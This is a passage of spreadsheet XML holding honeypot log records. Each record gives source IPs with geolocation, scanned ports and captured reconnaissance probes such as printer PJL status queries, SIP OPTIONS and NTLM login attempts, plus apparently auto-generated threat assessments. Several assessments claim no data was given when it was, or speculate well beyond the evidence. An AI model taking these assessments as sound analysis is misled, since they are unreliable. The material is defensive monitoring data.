    <t>&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_POP3_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;9100&amp;&amp;21&amp;&amp;110&amp;&amp;143&amp;&amp;443&amp;&amp;NA&amp;&amp;1433&amp;&amp;23&amp;&amp;3389&amp;&amp;5432&amp;&amp;80&amp;&amp;445&amp;&amp;25&amp;&amp;3306</t>
  </si>
  <si>
    <t>connection&amp;&amp;request&amp;&amp;login&amp;&amp;NA&amp;&amp;query&amp;&amp;GET&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.213;rport=1787'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 5.182.38.84:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '185.74.222.213:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.116.162:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.213;rport=25111'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.116.162:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.60.171.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.213,62532)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (qvRauTTa,)}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.8.76:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '156.244.37.11:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 185.74.222.213:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '209.145.61.177:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 185.74.222.213:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.213,4182)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (lEXJnjds,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.213;rport=21170'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8dd5</t>
  </si>
  <si>
    <t>There is insufficient log data provided to analyze any potential malicious activity.</t>
  </si>
  <si>
    <t>There doesn't seem to be any log data provided. Please provide the actual log data for analysis. 
Once you provide the data, I can help with identifying the type of attack based on the analysis.</t>
  </si>
  <si>
    <t>6f5426360b5cff88e29e59e2a22b9207</t>
  </si>
  <si>
    <t>24.117.31.54</t>
  </si>
  <si>
    <t>24-117-31-54.cpe.sparklight.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>ND</t>
  </si>
  <si>
    <t>North Dakota</t>
  </si>
  <si>
    <t>Cass</t>
  </si>
  <si>
    <t>Fargo</t>
  </si>
  <si>
    <t>5059163</t>
  </si>
  <si>
    <t>58103</t>
  </si>
  <si>
    <t>46.8647</t>
  </si>
  <si>
    <t>-96.8263</t>
  </si>
  <si>
    <t>11492</t>
  </si>
  <si>
    <t>CABLE ONE, INC.</t>
  </si>
  <si>
    <t>Sparklight</t>
  </si>
  <si>
    <t>::ffff:1875:1f36</t>
  </si>
  <si>
    <t>There is insufficient information for analysis.</t>
  </si>
  <si>
    <t>I don't have any log data to analyze. Please provide the actual log data for me to help with identifying the types of attacks.</t>
  </si>
  <si>
    <t>a8af74a4c19d17b52d48937fd52c9df5</t>
  </si>
  <si>
    <t>154.212.141.209</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_SSH_H20&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_SIP_H9&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_POP3_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;443&amp;&amp;22&amp;&amp;23&amp;&amp;9100&amp;&amp;143&amp;&amp;110&amp;&amp;NA&amp;&amp;80&amp;&amp;3389&amp;&amp;8443&amp;&amp;5432&amp;&amp;25&amp;&amp;21&amp;&amp;1433</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;login&amp;&amp;request&amp;&amp;query&amp;&amp;NA&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.209;rport=55087'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 122.170.7.108:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.4.48.242:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '149.102.153.168:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/version'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/v1'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8dd1</t>
  </si>
  <si>
    <t>An attempt was made to access an IMAP service, which could be a reconnaissance or scanning activity by an attacker, likely part of a larger malicious operation. This may indicate that the system is being scanned for vulnerabilities or tested for open services. The lack of a specific action taken suggests this might be an initial probing step. &amp;&amp; Attempt to connect to database service without authentication information provided. 
No valid credentials sent, potentially indicating brute force or unauthorized access attempt. 
May be an indication of malicious activity targeting database vulnerabilities.</t>
  </si>
  <si>
    <t>bee3b0fb6e0ccbbba1cda4c42a8d2c67</t>
  </si>
  <si>
    <t>154.212.141.134</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Credential Stuffing&amp;&amp;Encryption Misuse&amp;&amp;Reconnaissance</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_POP3_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;9100&amp;&amp;445&amp;&amp;23&amp;&amp;443&amp;&amp;21&amp;&amp;389&amp;&amp;3306&amp;&amp;110&amp;&amp;3389&amp;&amp;NA&amp;&amp;25&amp;&amp;1433&amp;&amp;5432</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;NA&amp;&amp;login&amp;&amp;query&amp;&amp;request&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.60.171.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.134,43520)}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 5.182.38.84:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.134,58136)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (gMcMsfgj,)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.134;rport=51720'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.134,50270)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sYkYVDUB,)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '95.164.21.98:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.60.209.6:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 209.145.61.177:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.134,48866)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (cvYrlrUH,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.134;rport=56000'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '193.57.138.110:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 154.26.156.60:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8d86</t>
  </si>
  <si>
    <t>No data provided to analyze. &amp;&amp; No POP3 connection established, possibly an attempt to scan or exploit service for unauthorized access. &amp;&amp; This data indicates an attempt to authenticate with NTLM credentials through the SMTP service. The authentication is being requested by the client and the server is responding. It suggests a potential brute force login or password cracking attempt. &amp;&amp; An attacker is attempting to establish a secure connection using the STARTTLS command, possibly to mask malicious activity. This could be an attempt to inject malware or steal sensitive information. It may also indicate a phishing attack or other type of email-based scam.</t>
  </si>
  <si>
    <t>Password cracking &amp;&amp; SMTP Attack</t>
  </si>
  <si>
    <t>7502a0c80189a9d9029d481a6828e667</t>
  </si>
  <si>
    <t>72.48.22.88</t>
  </si>
  <si>
    <t>72-48-22-88.dyn.grandenetworks.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>23&amp;&amp;44565&amp;&amp;44792&amp;&amp;44587&amp;&amp;43478&amp;&amp;NA</t>
  </si>
  <si>
    <t>Denton</t>
  </si>
  <si>
    <t>Double Oak</t>
  </si>
  <si>
    <t>4686709</t>
  </si>
  <si>
    <t>33.0651</t>
  </si>
  <si>
    <t>-97.1106</t>
  </si>
  <si>
    <t>7459</t>
  </si>
  <si>
    <t>Grande Communications Networks, LLC</t>
  </si>
  <si>
    <t>Grande Communications Networks</t>
  </si>
  <si>
    <t>Grande Communications FRISCO PARKER SQUARE</t>
  </si>
  <si>
    <t>::ffff:4830:1658</t>
  </si>
  <si>
    <t>9c852598d10e8bed826662bb6f66638c</t>
  </si>
  <si>
    <t>154.61.72.205</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H10</t>
  </si>
  <si>
    <t>Thāne</t>
  </si>
  <si>
    <t>1254661</t>
  </si>
  <si>
    <t>400601</t>
  </si>
  <si>
    <t>19.2183</t>
  </si>
  <si>
    <t>72.9781</t>
  </si>
  <si>
    <t>141148</t>
  </si>
  <si>
    <t>MyBharat Net Private Limited</t>
  </si>
  <si>
    <t>IntechDC</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,19673)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,19708)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,60370)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,4283)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,37513)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,37573)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,26596)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,26644)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,49140)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,49196)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,14536)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,14630)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,51442)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,51547)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,38953)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,39035)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,29874)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,29951)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,3996)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,4053)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,51835)}</t>
  </si>
  <si>
    <t>::ffff:9a3d:48cd</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze or describe any possible malicious activity. &amp;&amp; No log data provided, cannot determine malicious activity. &amp;&amp; An incoming connection from an unknown IP address to SMB service has been detected. This could be a sign of potential unauthorized access or file sharing attempts. It may also indicate a malicious scan for vulnerabilities. &amp;&amp; An incoming SMB connection from IP address 154.61.72.205 with port 51835 suggests potential malicious activity such as a brute force attack or unauthorized access attempt to shared resources. This could be an indication of malware spreading or data exfiltration. The unusual port and source IP may indicate a spoofed or compromised host. &amp;&amp; No log data provided, unable to analyze or comment on possible malicious activity. &amp;&amp; Possible attempt to access Microsoft SQL Server database without proper authentication credentials. This could be a brute-force login or unauthorized access attempt. Indicates potential security breach.</t>
  </si>
  <si>
    <t>SQL Attack</t>
  </si>
  <si>
    <t>24f6cea833aae3cf97c1dd3f4a632596</t>
  </si>
  <si>
    <t>221.151.209.25</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Yeoncheon-gun</t>
  </si>
  <si>
    <t>Yeoncheon-gun (Jangnam-myeon)</t>
  </si>
  <si>
    <t>1832697</t>
  </si>
  <si>
    <t>37.981700000000004</t>
  </si>
  <si>
    <t>126.884</t>
  </si>
  <si>
    <t>::ffff:dd97:d119</t>
  </si>
  <si>
    <t>No suspicious TELNET activity detected as of now, but it does not rule out future malicious attempts.</t>
  </si>
  <si>
    <t>Portscan</t>
  </si>
  <si>
    <t>c9b292a2685aaa84a00f757fedbc9a8d</t>
  </si>
  <si>
    <t>93.91.157.119</t>
  </si>
  <si>
    <t>u157-119.static.kabel1.cz&amp;&amp;NA</t>
  </si>
  <si>
    <t>CZ</t>
  </si>
  <si>
    <t>Czechia</t>
  </si>
  <si>
    <t>42</t>
  </si>
  <si>
    <t>Ústecký kraj</t>
  </si>
  <si>
    <t>Chomutov District</t>
  </si>
  <si>
    <t>Chomutov</t>
  </si>
  <si>
    <t>3077685</t>
  </si>
  <si>
    <t>430 01</t>
  </si>
  <si>
    <t>50.4583</t>
  </si>
  <si>
    <t>13.3974</t>
  </si>
  <si>
    <t>47232</t>
  </si>
  <si>
    <t>ISP Alliance a.s.</t>
  </si>
  <si>
    <t>GRAPESC I</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:5d5b:9d77</t>
  </si>
  <si>
    <t>A GET request is being made to the root directory of a server from an IP address, possibly indicating reconnaissance or information gathering by an unknown entity. The request includes an Accept header that allows for plain text and HTML responses. This could be a probe to identify vulnerable services. &amp;&amp; Possible malicious activity is a GET request from an unknown IP address (103.211.202.140) to the root directory of a service, possibly attempting to identify or exploit vulnerabilities on the system. The request includes a specific Accept header that may indicate further malicious intent. The request appears to be coming from an external source.</t>
  </si>
  <si>
    <t>PortScan</t>
  </si>
  <si>
    <t>2694671a731016798bf2c8edd80da343</t>
  </si>
  <si>
    <t>198.235.24.137</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_POP3_H2&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_FTP_H21&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_IRC_H32&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SOCKS5_H23</t>
  </si>
  <si>
